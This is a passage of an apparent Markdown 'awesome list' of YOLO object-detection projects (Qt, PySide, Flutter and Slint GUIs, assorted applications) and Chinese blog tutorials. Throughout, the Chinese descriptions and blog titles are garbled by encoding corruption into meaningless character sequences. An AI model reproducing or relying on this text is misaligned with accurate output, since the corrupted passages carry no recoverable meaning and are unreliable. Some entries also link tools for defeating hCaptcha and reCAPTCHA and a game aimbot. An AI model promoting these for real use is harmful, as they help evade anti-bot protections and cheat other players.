‡ๆฃ€ๆต‹ๅ’Œ่ฏญไน‰ๅˆ†ๅ‰ฒใ€‚ - [chenanga/qt5_yolov5_2.0](https://github.com/chenanga/qt5_yolov5_2.0) <img src="https://img.shields.io/github/stars/chenanga/qt5_yolov5_2.0?style=social"/> : PyqtๆญๅปบYOLOV5็›ฎๆ ‡ๆฃ€ๆต‹็•Œ้ข-็ฌฌไธ€ๆฌกไผ˜ๅŒ–ๅŽ็š„็‰ˆๆœฌใ€‚ - [xun-xh/yolov5-onnx-pyqt-exe](https://github.com/xun-xh/yolov5-onnx-pyqt-exe) <img src="https://img.shields.io/github/stars/xun-xh/yolov5-onnx-pyqt-exe?style=social"/> : ๅŸบไบŽYolov5 + PyQt5 + onnxruntime็š„็›ฎๆ ‡ๆฃ€ๆต‹้ƒจ็ฝฒใ€‚ - [LPC1616/pyqt-yolox-modbus](https://github.com/LPC1616/pyqt-yolox-modbus) <img src="https://img.shields.io/github/stars/LPC1616/pyqt-yolox-modbus?style=social"/> : qt็•Œ้ข+yolox่ฏ†ๅˆซ็ฎ—ๆณ•+modbus้€šไฟกใ€‚ - [zawawiAI/yolo_gpt](https://github.com/zawawiAI/yolo_gpt) <img src="https://img.shields.io/github/stars/zawawiAI/yolo_gpt?style=social"/> : This is a GUI application that integrates YOLOv8 object recognition with OpenAI's GPT-3 language generation model. - [LSH9832/yolov5_training_tool](https://github.com/LSH9832/yolov5_training_tool) <img src="https://img.shields.io/github/stars/LSH9832/yolov5_training_tool?style=social"/> : ๆœฌๅทฅๅ…ทไฝฟ็”จPYQT5็ผ–ๅ†™็•Œ้ขใ€‚้€š่ฟ‡ไฝฟ็”จ่ฏฅๅทฅๅ…ทๅฏไปฅๅฟซ้€Ÿ้ƒจ็ฝฒ็›ธๅบ”ๆ•ฐๆฎ้›†ๅนถ่ฎญ็ปƒ๏ผŒ็›ฎๅ‰ไปๅœจไธๆ–ญๆ›ดๆ–ฐไธญ๏ผŒ่พƒๅคง็š„็ผบ็‚นๆ˜ฏ็›ฎๅ‰ๅชๆ”ฏๆŒPascalVOCๆ ผๅผ็š„xmlๆ ‡็ญพๆ–‡ไปถ๏ผŒๆ‰€ไปฅๅ…ถๅฎƒๆ ผๅผ็š„ๆ ‡็ญพๆ–‡ไปถ้œ€่ฆๅ…ˆ่ฝฌๆขไธบPascalVOC็š„ๆ ผๅผ๏ผŒไธ”็›ฎๅ‰ไป…้€‚็”จไบŽLinux็ณป็ปŸไธ”ไป…ๅœจUbuntu16.04-20.04่ฏ•่ฟ่กŒใ€‚ - [Egrt/YOLO_PyQt5](https://github.com/Egrt/YOLO_PyQt5) <img src="https://img.shields.io/github/stars/Egrt/YOLO_PyQt5?style=social"/> : ไฝฟ็”จPyqt5ๆญๅปบYOLO็ณปๅˆ—ๅคš็บฟ็จ‹็›ฎๆ ‡ๆฃ€ๆต‹็ณป็ปŸใ€‚ - [smartwj/yolov5_pyqt5](https://github.com/smartwj/yolov5_pyqt5) <img src="https://img.shields.io/github/stars/smartwj/yolov5_pyqt5?style=social"/> : ๅŸบไบŽyolov5็š„pyqt5็›ฎๆ ‡ๆฃ€ๆต‹ๅ›พๅฝขไธŠไฝๆœบๅทฅๅ…ทใ€‚ - [LitChi-bit/YOLOv5-6.0-GUI](https://github.com/LitChi-bit/YOLOv5-6.0-GUI) <img src="https://img.shields.io/github/stars/LitChi-bit/YOLOv5-6.0-GUI?style=social"/> : Qt-GUI implementation of the YOLOv5 algorithm (ver.6). - [BraunGe/YOLOv5-GUI](https://github.com/BraunGe/YOLOv5-GUI) <img src="https://img.shields.io/github/stars/BraunGe/YOLOv5-GUI?style=social"/> : A GUI for YOLOv5, support all the 11 inference formats that YOLOv5 supports. - [PetervanLunteren/EcoAssist](https://github.com/PetervanLunteren/EcoAssist) <img src="https://img.shields.io/github/stars/PetervanLunteren/EcoAssist?style=social"/> : A no-code platform to train and deploy YOLOv5 object detection models. - [SwimmingLiu/yolov7-Pyside6](https://github.com/SwimmingLiu/yolov7-Pyside6) <img src="https://img.shields.io/github/stars/SwimmingLiu/yolov7-Pyside6?style=social"/> : PySide6 implementation of YOLOv7 GUI. - #### PySide-Related - [JSwimmingLiu/YOLOSHOW](https://github.com/SwimmingLiu/YOLOSHOW) <img src="https://img.shields.io/github/stars/SwimmingLiu/YOLOSHOW?style=social"/> : YOLO SHOW - YOLOv10 / YOLOv9 / YOLOv8 / YOLOv7 / YOLOv5 / RTDETR GUI based on Pyside6.[swimmingliu.cn/posts/diary/yoloshow](https://swimmingliu.cn/posts/diary/yoloshow) - [Jai-wei/YOLOv8-PySide6-GUI](https://github.com/Jai-wei/YOLOv8-PySide6-GUI) <img src="https://img.shields.io/github/stars/Jai-wei/YOLOv8-PySide6-GUI?style=social"/> : YoloSide - YOLOv8 GUI By PySide6. - #### Flutter-Related - [hiennguyen92/flutter_realtime_object_detection](https://github.com/hiennguyen92/flutter_realtime_object_detection) <img src="https://img.shields.io/github/stars/hiennguyen92/flutter_realtime_object_detection?style=social"/> : Flutter App real-time object detection with Tensorflow Lite. - #### Slint-Related - [codingonion/yolov5-gui-slint](https://github.com/codingonion/yolov5-gui-slint) <img src="https://img.shields.io/github/stars/codingonion/yolov5-gui-slint?style=social"/> : YOLOv5 GUI inference framework built with Slint. - ### Other Applications #### ๅ…ถๅฎƒๅบ”็”จ - [Ikomia-dev/IkomiaApi](https://github.com/Ikomia-dev/IkomiaApi) <img src="https://img.shields.io/github/stars/Ikomia-dev/IkomiaApi?style=social"/> : State-of-the-art algorithms in Computer Vision with a few lines of code. - [penny4860/Yolo-digit-detector](https://github.com/penny4860/Yolo-digit-detector) <img src="https://img.shields.io/github/stars/penny4860/Yolo-digit-detector?style=social"/> : Implemented digit detector in natural scene using resnet50 and Yolo-v2. I used SVHN as the training set, and implemented it using tensorflow and keras. - [chineseocr/table-detect](https://github.com/chineseocr/table-detect) <img src="https://img.shields.io/github/stars/chineseocr/table-detect?style=social"/> : table detect(yolo) , table line(unet) ๏ผˆ่กจๆ ผๆฃ€ๆต‹/่กจๆ ผๅ•ๅ…ƒๆ ผๅฎšไฝ๏ผ‰ใ€‚ - [thisiszhou/SexyYolo](https://github.com/thisiszhou/SexyYolo) <img src="https://img.shields.io/github/stars/thisiszhou/SexyYolo?style=social"/> : An implementation of Yolov3 with Tensorflow1.x, which could detect COCO and sexy or porn person simultaneously. - [javirk/Person_remover](https://github.com/javirk/Person_remover) <img src="https://img.shields.io/github/stars/javirk/Person_remover?style=social"/> : People removal in images using Pix2Pix and YOLO. - [foschmitz/yolo-python-rtsp](https://github.com/foschmitz/yolo-python-rtsp) <img src="https://img.shields.io/github/stars/foschmitz/yolo-python-rtsp?style=social"/> : Object detection using deep learning with Yolo, OpenCV and Python via Real Time Streaming Protocol (RTSP). - [ismail-mebsout/Parsing-PDFs-using-YOLOV3](https://github.com/ismail-mebsout/Parsing-PDFs-using-YOLOV3) <img src="https://img.shields.io/github/stars/ismail-mebsout/Parsing-PDFs-using-YOLOV3?style=social"/> : Parsing pdf tables using YOLOV3. - [008karan/PAN_OCR](https://github.com/008karan/PAN_OCR) <img src="https://img.shields.io/github/stars/008karan/PAN_OCR?style=social"/> : Building OCR using YOLO and Tesseract. - [zeyad-mansour/lunar](https://github.com/zeyad-mansour/lunar) <img src="https://img.shields.io/github/stars/zeyad-mansour/lunar?style=social"/> : Lunar is a neural network aimbot that uses real-time object detection accelerated with CUDA on Nvidia GPUs. - [lannguyen0910/food-recognition](https://github.com/lannguyen0910/food-recognition) <img src="https://img.shields.io/github/stars/lannguyen0910/food-recognition?style=social"/> : ๐Ÿ”๐ŸŸ๐Ÿ— Food analysis baseline with Theseus. Integrate object detection, image classification and multi-class semantic segmentation. ๐Ÿž๐Ÿ–๐Ÿ• - [killnice/yolov5-D435i](https://github.com/killnice/yolov5-D435i) <img src="https://img.shields.io/github/stars/killnice/yolov5-D435i?style=social"/> : using yolov5 and realsense D435i. - [SahilChachra/Video-Analytics-Dashboard](https://github.com/SahilChachra/Video-Analytics-Dashboard) <img src="https://img.shields.io/github/stars/SahilChachra/Video-Analytics-Dashboard?style=social"/> : Video Analytics dashboard built using YoloV5 and Streamlit. - [isLinXu/YOLOv5_Efficient](https://github.com/isLinXu/YOLOv5_Efficient) <img src="https://img.shields.io/github/stars/isLinXu/YOLOv5_Efficient?style=social"/> : Use yolov5 efficiently(้ซ˜ๆ•ˆๅœฐไฝฟ็”จYolo v5). - [HRan2004/Yolo-ArbV2](https://github.com/HRan2004/Yolo-ArbV2) <img src="https://img.shields.io/github/stars/HRan2004/Yolo-ArbV2?style=social"/> : Yolo-ArbV2 ๅœจๅฎŒๅ…จไฟๆŒYOLOv5ๅŠŸ่ƒฝๆƒ…ๅ†ตไธ‹๏ผŒๅฎž็Žฐๅฏ้€‰ๅคš่พนๅฝขไฟกๆฏ่พ“ๅ‡บใ€‚ - [Badw0lf613/wmreading_system](https://github.com/Badw0lf613/wmreading_system) <img src="https://img.shields.io/github/stars/Badw0lf613/wmreading_system?style=social"/> : ๅŸบไบŽYOLOv5็š„ๆฐด่กจ่ฏปๆ•ฐ็ณป็ปŸใ€‚ - [zgcr/SimpleAICV-pytorch-ImageNet-COCO-training](https://github.com/zgcr/SimpleAICV-pytorch-ImageNet-COCO-training) <img src="https://img.shields.io/github/stars/zgcr/SimpleAICV-pytorch-ImageNet-COCO-training?style=social"/> : SimpleAICV:pytorch training example on ImageNet(ILSVRC2012)/COCO2017/VOC2007+2012 datasets.Include ResNet/DarkNet/RetinaNet/FCOS/CenterNet/TTFNet/YOLOv3/YOLOv4/YOLOv5/YOLOX. - [ErenKaymakci/Real-Time-QR-Detection-and-Decoding](https://github.com/ErenKaymakci/Real-Time-QR-Detection-and-Decoding) <img src="https://img.shields.io/github/stars/ErenKaymakci/Real-Time-QR-Detection-and-Decoding?style=social"/> : This repo explain how qr codes works, qr detection and decoding. - [LUMAIS/AntDet_YOLOv5](https://github.com/LUMAIS/AntDet_YOLOv5) <img src="https://img.shields.io/github/stars/LUMAIS/AntDet_YOLOv5?style=social"/> : Ants and their Activiteis (Trophallaxis) Detection using YOLOv5 based on PyTorch. - [Jiseong-Ok/OCR-Yolov5-SwinIR-SVTR](https://github.com/Jiseong-Ok/OCR-Yolov5-SwinIR-SVTR) <img src="https://img.shields.io/github/stars/Jiseong-Ok/OCR-Yolov5-SwinIR-SVTR?style=social"/> : OCR(Korean). - [QIN2DIM/hcaptcha-challenger](https://github.com/QIN2DIM/hcaptcha-challenger) <img src="https://img.shields.io/github/stars/QIN2DIM/hcaptcha-challenger?style=social"/> : ๐Ÿฅ‚ Gracefully face hCaptcha challenge with YOLOv6(ONNX) embedded solution. - [bobjiangps/vision](https://github.com/bobjiangps/vision) <img src="https://img.shields.io/github/stars/bobjiangps/vision?style=social"/> : UI auto test framework based on YOLO to recognize elements, less code, less maintenance, cross platform, cross project / ๅŸบไบŽYOLO็š„UIๅฑ‚่‡ชๅŠจๅŒ–ๆต‹่ฏ•ๆก†ๆžถ, ๅฏ่ฏ†ๅˆซๆŽงไปถ็ฑปๅž‹๏ผŒๅ‡ๅฐ‘ไปฃ็ ๅ’Œ็ปดๆŠค๏ผŒไธ€ๅฎš็จ‹ๅบฆไธŠ่ทจๅนณๅฐ่ทจ้กน็›ฎใ€‚ - [RizwanMunawar/yolov7-object-cropping](https://github.com/RizwanMunawar/yolov7-object-cropping) <img src="https://img.shields.io/github/stars/RizwanMunawar/yolov7-object-cropping?style=social"/> : YOLOv7 Object Cropping Using OpenCV. - [RizwanMunawar/yolov7-object-blurring](https://github.com/RizwanMunawar/yolov7-object-blurring) <img src="https://img.shields.io/github/stars/RizwanMunawar/yolov7-object-blurring?style=social"/> : YOLOv7 Object Blurring Using PyTorch and OpenCV. - [pacocp/YOLOF](https://github.com/pacocp/YOLOF) <img src="https://img.shields.io/github/stars/pacocp/YOLOF?style=social"/> : ๐Ÿ“น YOLO meets Optical Flow. - [FabianPlum/OmniTrax](https://github.com/FabianPlum/OmniTrax) <img src="https://img.shields.io/github/stars/FabianPlum/OmniTrax?style=social"/> : Deep learning-based multi animal tracking and pose estimation Blender Add-on. - [aweihao/ExDark2Yolo](https://github.com/aweihao/ExDark2Yolo) <img src="https://img.shields.io/github/stars/aweihao/ExDark2Yolo?style=social"/> : Convert ExDark annotated format data to YOLO format data. / ๅฐ†ExDarkๆ ‡ๆณจๆ ผๅผ็š„ๆ•ฐๆฎ่ฝฌๆขๆˆYOLOๆ ผๅผ็š„ๆ•ฐๆฎใ€‚ - [ozankaraali/yolov3-recaptcha](https://github.com/ozankaraali/yolov3-recaptcha) <img src="https://img.shields.io/github/stars/ozankaraali/yolov3-recaptcha?style=social"/> : Solve Recaptcha with YoloV3. A proof of concept Recaptcha solver using YOLOv3 on Tensorflow 2.0 and Selenium. This tutorial shows that with a better trained object detection weight file, ReCaptcha can be easily solved. - [jyp-studio/Invoice_detection](https://github.com/jyp-studio/Invoice_detection) <img src="https://img.shields.io/github/stars/jyp-studio/Invoice_detection?style=social"/> : This is an AI model for detecting and recognizing invoice information by yolov5 and OCR. - [vmc-7645/YOLOv8-retail](https://github.com/vmc-7645/YOLOv8-retail) <img src="https://img.shields.io/github/stars/vmc-7645/YOLOv8-retail?style=social"/> : Detect retail products via the YOLOv8 object recognition engine. - [TAber-W/RM_4-points_yolov5](https://github.com/TAber-W/RM_4-points_yolov5) <img src="https://img.shields.io/github/stars/TAber-W/RM_4-points_yolov5?style=social"/> : Robomaster ๅŸบไบŽyolofaceๅ’ŒMobileNetไฟฎๆ”น็š„ๅ››็‚นๆจกๅž‹. - [eternal-echo/picking](https://github.com/eternal-echo/picking) <img src="https://img.shields.io/github/stars/eternal-echo/picking?style=social"/> : ๅŸบไบŽYOLO v5่ง†่ง‰ๅˆ†ๆ‹ฃ้›ถไปถ็ณป็ปŸ่ฎพ่ฎกใ€‚ - [swordswind/yolo_ocr_api_server](https://github.com/swordswind/yolo_ocr_api_server) <img src="https://img.shields.io/github/stars/swordswind/yolo_ocr_api_server?style=social"/> : YOLOv10&EasyOCR่žๅˆๅ›พๅƒ่ฏ†ๅˆซAPIๆœๅŠกๅ™จใ€‚ ## Blogs - [็ŸฅไนŽใ€ŒๆฑŸๅคง็™ฝใ€| ๅพฎไฟกๅ…ฌไผ—ๅทใ€ŒๆฑŸๅคง็™ฝใ€](https://www.zhihu.com/people/nan-yang-8-13) - [2020-05-27๏ผŒๆทฑๅ…ฅๆต…ๅ‡บYolo็ณปๅˆ—ไน‹Yolov3&Yolov4&Yolov5&Yoloxๆ ธๅฟƒๅŸบ็ก€็Ÿฅ่ฏ†ๅฎŒๆ•ด่ฎฒ่งฃ](https://zhuanlan.zhihu.com/p/143747206) - [2020-08-10๏ผŒๆทฑๅ…ฅๆต…ๅ‡บYolo็ณปๅˆ—ไน‹Yolov5ๆ ธๅฟƒๅŸบ็ก€็Ÿฅ่ฏ†ๅฎŒๆ•ด่ฎฒ่งฃ](https://zhuanlan.zhihu.com/p/172121380) - [2021-08-09๏ผŒๆทฑๅ…ฅๆต…ๅ‡บYoloxไน‹่‡ชๆœ‰ๆ•ฐๆฎ้›†่ฎญ็ปƒ่ถ…่ฏฆ็ป†ๆ•™็จ‹](https://zhuanlan.zhihu.com/p/397499216) - [2021-08-11๏ผŒๆทฑๅ…ฅๆต…ๅ‡บYolo็ณปๅˆ—ไน‹Yoloxๆ ธๅฟƒๅŸบ็ก€ๅฎŒๆ•ด่ฎฒ่งฃ](https://zhuanlan.zhihu.com/p/397993315) - [2022-01-30๏ผŒๆทฑๅ…ฅๆต…ๅ‡บ0ๅŸบ็ก€ๅ…ฅ้—จAIๅŠ็›ฎๆ ‡ๆฃ€ๆต‹่ฏฆ็ป†ๅญฆไน ่ทฏๅพ„](https://zhuanlan.zhihu.com/p/463221190) - [2022-01-30๏ผŒๆทฑๅ…ฅๆต…ๅ‡บYolov5ไน‹่‡ชๆœ‰ๆ•ฐๆฎ้›†่ฎญ็ปƒ่ถ…่ฏฆ็ป†ๆ•™็จ‹](https://zhuanlan.zhihu.com/p/463176500) - [2022-11-03๏ผŒๅฎž่ทตๆ•™็จ‹ | ๅœจyolov5ไธŠ้ชŒ่ฏ็š„ไธ€ไบ›ๆƒณๆณ•ๅฐ่ฏ•](https://mp.weixin.qq.com/s/HqXJov5fWIlgKhMp2_Ca7g) - [2022-12-17๏ผŒYOLOv6็ฒพๅบฆๆทฑๅบฆไผ˜ๅŒ–๏ผŒๆ„Ÿ็Ÿฅ้‡ๅŒ–็š„้‡ๅ‚ๅ†่ฎพ่ฎก](https://mp.weixin.qq.com/s/lm77Fe4e6e_cx_gJYhp8QA) - [2022-12-28๏ผŒRepvgg้‡ๅ‚ๆ•ฐๅŒ–๏ผŒYOLOๆฃ€ๆต‹็ฎ—ๆณ•ๆถจ็‚นๅฎž่ทต๏ผ](https://mp.weixin.qq.com/s/QZnpo24537fhGeFj7-MR_Q) - [2023-01-16๏ผŒYOLOv8่‡ชๆœ‰ๆ•ฐๆฎ้›†่ฎญ็ปƒ๏ผŒๅŠๅคšไปปๅŠกไฝฟ็”จ่ฏฆ็ป†ๆ•™็จ‹](https://mp.weixin.qq.com/s/zhoFAKvFOHh0T1R2fvwZxQ) - [2023-01-28๏ผŒYOLOv8+DeepSORTๅŽŸ็†่ฎฒ่งฃๅŠๅฎž็Žฐ๏ผˆ้™„ๆบ็ ๏ผ‰](https://mp.weixin.qq.com/s/rDpbzIG95TmgpJQH71QY8g) - [2023-02-23๏ผŒๆทฑๅ…ฅๆต…ๅ‡บTensorRTไธญONNXๆจกๅž‹่งฃๆž่ฟ‡็จ‹](https://mp.weixin.qq.com/s/C3O3QeSUnu4LUBxHZtur7A) - [2023-02-24๏ผŒๆจกๅž‹้ƒจ็ฝฒ | TensorRTๅŠ ้€ŸPyTorchๅฎžๆˆ˜้ƒจ็ฝฒๆ•™็จ‹๏ผŒๅ€ผๅพ—ๆ”ถ่—ๅญฆไน ๏ผ](https://mp.weixin.qq.com/s/AdnfJ48mnwFejTtHN4v70w) - [2023-02-25๏ผŒYOLOv8+ByteTrack๏ผŒไฝœ่€…ๅผ€ๆบๅคš็›ฎๆ ‡่ทŸ่ธช็ฎ—ๆณ•](https://mp.weixin.qq.com/s/DZcVdwFZP3TKaTk0n98oeg) - [2023-02-27๏ผŒๅŸบไบŽYOLOv5็š„ๅŠ็›‘็ฃ็›ฎๆ ‡ๆฃ€ๆต‹๏ผŒ็ฎ—ๆณ•่ฟ›้˜ถไน‹่ทฏ๏ผŒ้˜ฟ้‡Œๅ›ข้˜Ÿๆ–ฐไฝœ๏ผ๏ผˆ้™„่ฎบๆ–‡ๅŠๆบ็ ๏ผ‰](https://mp.weixin.qq.com/s/9qpuLCvgaQjc_JOdZchxjQ) - [2023-03-18๏ผŒEfficient Teacher๏ผŒ้’ˆๅฏนYOLOv5็š„ๅŠ็›‘็ฃ็›ฎๆ ‡ๆฃ€ๆต‹็ฎ—ๆณ•๏ผˆ้™„่ฎบๆ–‡ๅŠๆบ็ ๏ผ‰](https://mp.weixin.qq.com/s/3YnNAx_2PFqpxLUZZWoYAg) - [2023-03-20๏ผŒonnxๆจกๅž‹่ฝฌๆข๏ผŒopไธๆ”ฏๆŒๆ—ถ็š„ๅฟƒๅพ—็ป้ชŒๅˆ†ไบซ](https://mp.weixin.qq.com/s/qkktjhALMKgRwSSiq6n5bA) - [2023-03-24๏ผŒๆทฑๅบฆๅญฆไน ๆจกๅž‹่ฎญ็ปƒไธญ๏ผŒGPUๅ’Œๆ˜พๅญ˜ๅˆ†ๆž](https://mp.weixin.qq.com/s/xyCNXUBE2rTjTUnK6bBm7g) - [2023-03-25๏ผŒPyTorchๆจกๅž‹่ฎญ็ปƒ๏ผŒๅนถ่กŒๅŠ ้€Ÿๆ–นๆณ•ๆขณ็†ๆฑ‡ๆ€ป](https://mp.weixin.qq.com/s/54FaTRh8dUXwI4JqO9LAsQ) - [2023-03-27๏ผŒๅŸบไบŽYOLO็š„้“ๅž‹ๆ่กจ้ข็ผบ้™ท่ฏ†ๅˆซ ](https://mp.weixin.qq.com/s/sTL6aATIDOh8RpicU2B9tA) - [2023-03-31๏ผŒๅฐ็›ฎๆ ‡ๆฃ€ๆต‹็ฒพๅบฆไผ˜ๅŒ–ๆ–นๅผ๏ผŒCEASAๆจกๅ—๏ผŒๅณๆ’ๅณ็”จ๏ผˆ้™„่ฎบๆ–‡ๅŠๆบ็ ๏ผ‰](https://mp.weixin.qq.com/s/fXV3rdB_YtSVap0FtK_AeQ) - [2023-04-01๏ผŒGPU ๅˆฉ็”จ็Ž‡ไฝŽๅธธ่งๅŽŸๅ› ๅˆ†ๆžๅŠไผ˜ๅŒ–](https://mp.weixin.qq.com/s/LCJZqnNB6C15EEMPB1X-hQ) - [2023-04-03๏ผŒๅฐ็›ฎๆ ‡ๆฃ€ๆต‹็ฎ—ๆณ•๏ผŒYolov5ไผ˜ๅŒ–ๅ‡็บง ๏ผŒๅณๆ’ๅณ็”จ๏ผŒๅ€ผๅพ—ๅฐ่ฏ•๏ผ](https://mp.weixin.qq.com/s/KEdsJO1z19sq7rTtwyC4Rg) - [2023-04-22๏ผŒCUDAๅท็งฏ็ฎ—ๅญ๏ผŒๆ‰‹ๅ†™่ฏฆ็ป†ๅฎž็Žฐๆต็จ‹](https://mp.weixin.qq.com/s/3rQQ31LWxvDli_1uwGsHIw) - [2023-04-28๏ผŒๆทฑๅ…ฅๆต…ๅ‡บPyTorchๆจกๅž‹๏ผŒint8้‡ๅŒ–ๅŠๅŽŸ็†ๆต็จ‹](https://mp.weixin.qq.com/s/pij3APMt_wtyS6St89lbdQ) - [2023-04-29๏ผŒAI่ง†่ง‰้กน็›ฎ๏ผŒๅ›พๅƒๆ ‡ๆณจๅทฅๅ…ทๆขณ็†ๆฑ‡ๆ€ป](https://mp.weixin.qq.com/s/SvgTQfKqGlI5DsrsmfKUhA) - [2023-05-08๏ผŒLabel-Studio X SAM๏ผŒๅŠ่‡ชๅŠจๅŒ–ๆ ‡ๆณจ็ฅžๅ™จ๏ผˆ้™„ๆบ็ ๏ผ‰](https://mp.weixin.qq.com/s/f-sD8ukV3Nm28_-yHi44BA) - [2023-05-09๏ผŒๆทฑๅ…ฅๆต…ๅ‡บๅคš็›ฎๆ ‡่ทŸ่ธชๆŠ€ๆœฏ็š„็ ”็ฉถไธŽๆŽข็ดข](https://mp.weixin.qq.com/s/aYam5aQXJTZ1ysubEfewYA) - [2023-05-10๏ผŒ่ถ…ๅผบ็›ฎๆ ‡ๆฃ€ๆต‹ๅ™จRT-DETR๏ผŒไฟๅง†็บง้ƒจ็ฝฒๆ•™็จ‹๏ผŒไปŽๅ…ฅ้—จๅˆฐ็ฒพ้€š๏ผˆ้™„่ฎบๆ–‡ๅŠๆบ็ ๏ผ‰](https://mp.weixin.qq.com/s/NfUWJ5cBTXvuB45l1hnSfw) - [2023-05-13๏ผŒYOLOCS็›ฎๆ ‡ๆฃ€ๆต‹็ฎ—ๆณ•๏ผŒYOLOv5็š„Backbone/Neck/Headๅ…จ้ขๆ”น่ฟ›](https://mp.weixin.qq.com/s/exo2JkLluChvLDSif2JvMQ) - [2023-05-17๏ผŒไธ€ๆ–‡็œ‹ๅฐฝๆทฑๅบฆๅญฆไน ๅ„็งๆณจๆ„ๅŠ›ๆœบๅˆถ๏ผŒๅญฆไน ๆŽจ่๏ผ](https://mp.weixin.qq.com/s/PkzzElN1uk2Yzu1DsYnOdQ) - [2023-05-26๏ผŒไธ€ๆ–‡่ฏปๆ‡‚PyTorchๆ˜พๅญ˜็ฎก็†ๆœบๅˆถ๏ผŒๆŽจ่ๅญฆไน ๏ผ](https://mp.weixin.qq.com/s/a9LK35lLE4yfQkqvBp6ujQ) - [2023-06-05๏ผŒไธคไธ‡ๅญ—้•ฟๆ–‡๏ผŒ็›ฎๆ ‡ๆฃ€ๆต‹ๅ…ฅ้—จ็œ‹่ฟ™็ฏ‡ๅฐฑๅคŸไบ†๏ผŒๆŽจ่ๆ”ถ่—๏ผ](https://mp.weixin.qq.com/s/EBc1JrR5n4BlWGBx8kuiXw) - [2023-06-07๏ผŒๆ‰‹ๆŠŠๆ‰‹ๅธฆไฝ ๏ผŒ่‡ชๅทฑ่ฎพ่ฎกๅฎž็Žฐไธ€ไธชๆทฑๅบฆๅญฆไน ๆก†ๆžถ๏ผˆ้™„ไปฃ็ ๅฎž็Žฐ๏ผ‰](https://mp.weixin.qq.com/s/-8A_XaOwHyg653UyRbArQQ) - [2023-06-12๏ผŒMMDetection็›ฎๆ ‡ๆฃ€ๆต‹ๆก†ๆžถ่ฏฆ่งฃ๏ผŒๅŠ่ฎญ็ปƒ่‡ชๆœ‰ๆ•ฐๆฎ้›†ๆ•™็จ‹](https://mp.weixin.qq.com/s/U3irSW9UTKt0gY0HCV9slQ) - [2023-06-19๏ผŒไธ‡ๅญ—้•ฟๆ–‡๏ผŒๅฝปๅบ•ๆžๆ‡‚YOLOv8็ฝ‘็ปœ็ป“ๆž„ๅŠไปฃ็ ๅฎžๆˆ˜๏ผ](https://mp.weixin.qq.com/s/vXIx7dBRxgxnvh5BoIRQZw) - [2023-06-27๏ผŒTensorRTๆจกๅž‹้ƒจ็ฝฒ๏ผŒๆทปๅŠ ่‡ชๅทฑๆ’ไปถ็š„่ฝๅœฐๆ–นๅผ](https://mp.weixin.qq.com/s/E-Iebdd4Es5UK-TrBUJcjA) - [2023-06-29๏ผŒYOLOv7+Transformer้ƒจ็ฝฒ๏ผŒTensorRTๅบ”็”จๅฎžๆˆ˜๏ผˆ้™„ไปฃ็ ๏ผ‰](https://mp.weixin.qq.com/s/znxT8nsfkq0s5NHRnAxYaw) - [2023-07-06๏ผŒไธ‡ๅญ—้•ฟๆ–‡๏ผŒๅŸบไบŽPyTorch็š„ๅคš็งๅท็งฏ็ฅž็ป็ฝ‘็ปœBackBoneไปฃ็ ๅฎž็Žฐ](https://mp.weixin.qq.com/s/TQ88Oex6YTKAkUZL3kLu3A) - [2023-07-21๏ผŒไธ‡ๅญ—้•ฟๆ–‡๏ผŒYOLOv5ๆ‰‹ๅŠฟ่ฏ†ๅˆซ่ฎญ็ปƒ่ฝฌๆขๅŠๆจกๅž‹้ƒจ็ฝฒ๏ผ๏ผˆ้™„ไปฃ็ ๏ผ‰](https://mp.weixin.qq.com/s/1yvJIObEs9H4C9Qd3tb9kA) - [2023-08-03๏ผŒTensorRTๆจกๅž‹INT8้‡ๅŒ–๏ผŒPythonไปฃ็ ้ƒจ็ฝฒๅฎž็Žฐ](https://mp.weixin.qq.com/s/Phu7UmPKuSrUOhCQDV2xEQ) - [2023-08-12๏ผŒ็›ฎๆ ‡ๆฃ€ๆต‹็ฎ—ๆณ•๏ผŒๆฃ€ๆต‹ๆก†ไฝ็ฝฎไผ˜ๅŒ–ๆ€ป็ป“](https://mp.weixin.qq.com/s/_JDPP7Yq8E4bXxZtWlOy6Q) - [2023-09-01๏ผŒๅŸบไบŽYolo็ฎ—ๆณ•็š„AIๆ•ฐ้’ข็ญ‹๏ผŒๆ•ดไฝ“่งฃๅ†ณๆ–นๆกˆๆฑ‡ๆ€ป](https://mp.weixin.qq.com/s/plWUuEVkbK-nDycqVDFU8A) - [2024-01-26๏ผŒๆทฑๅ…ฅๆต…ๅ‡บ๏ผŒYOLOv8็ฎ—ๆณ•ไฝฟ็”จๆŒ‡ๅ—](https://mp.weixin.qq.com/s/9naZZ7wXugppelcmPHGVlQ) - [2024-02-23๏ผŒ็›ฎๆ ‡ๆฃ€ๆต‹YOLOv9็ฎ—ๆณ•๏ผŒ้‡็ฃ…ๅผ€ๆบ๏ผ๏ผˆ้™„่ฎบๆ–‡ๅŠๆบ็ ๏ผ‰](https://mp.weixin.qq.com/s/RVG-9h8zKsWACMr6dDRpUQ) - [2024-04-12๏ผŒๆทฑๅ…ฅๆต…ๅ‡บ๏ผŒPyTorchๆจกๅž‹int8้‡ๅŒ–ๅŽŸ็†ๆ‹†่งฃ](https://mp.weixin.qq.com/s/j2QS3LdudrrlyZYQkVrl5Q) - [็ŸฅไนŽใ€Œ่ฟช่ฟฆๅฅฅ็‰นๆ›ผใ€](https://www.zhihu.com/people/nemofeng95) - [2022-08-12๏ผŒไปŽ็™พๅบฆ้ฃžๆกจYOLOSeriesๅบ“็œ‹ๅ„ไธชYOLOๆจกๅž‹](https://zhuanlan.zhihu.com/p/550057480) - [2022-09-21๏ผŒYOLOๅ†…ๅทๆ—ถๆœŸ่ฏฅๅฆ‚ไฝ•้€‰ๆจกๅž‹๏ผŸ](https://zhuanlan.zhihu.com/p/566469003) - [็ŸฅไนŽใ€ŒPoemAIใ€](https://www.zhihu.com/people/LEYM2) - [2022-07-10๏ผŒYOLOๅฎถๆ—่ฟ›ๅŒ–ๅฒ๏ผˆv1-v7๏ผ‰](https://zhuanlan.zhihu.com/p/539932517) - [็ŸฅไนŽใ€Œ็ง‘ๆŠ€็Œ›ๅ…ฝใ€](https://www.zhihu.com/people/wang-jia-hao-53-3) - [2020-08-14๏ผŒไฝ ไธ€ๅฎšไปŽๆœช็œ‹่ฟ‡ๅฆ‚ๆญค้€šไฟ—ๆ˜“ๆ‡‚็š„YOLO็ณปๅˆ—(ไปŽv1ๅˆฐv5)ๆจกๅž‹่งฃ่ฏป (ไธŠ)](https://zhuanlan.zhihu.com/p/183261974) - [2020-08-21๏ผŒไฝ ไธ€ๅฎšไปŽๆœช็œ‹่ฟ‡ๅฆ‚ๆญค้€šไฟ—ๆ˜“ๆ‡‚็š„YOLO็ณปๅˆ—(ไปŽv1ๅˆฐv5)ๆจกๅž‹่งฃ่ฏป (ไธญ)](https://zhuanlan.zhihu.com/p/183781646) - 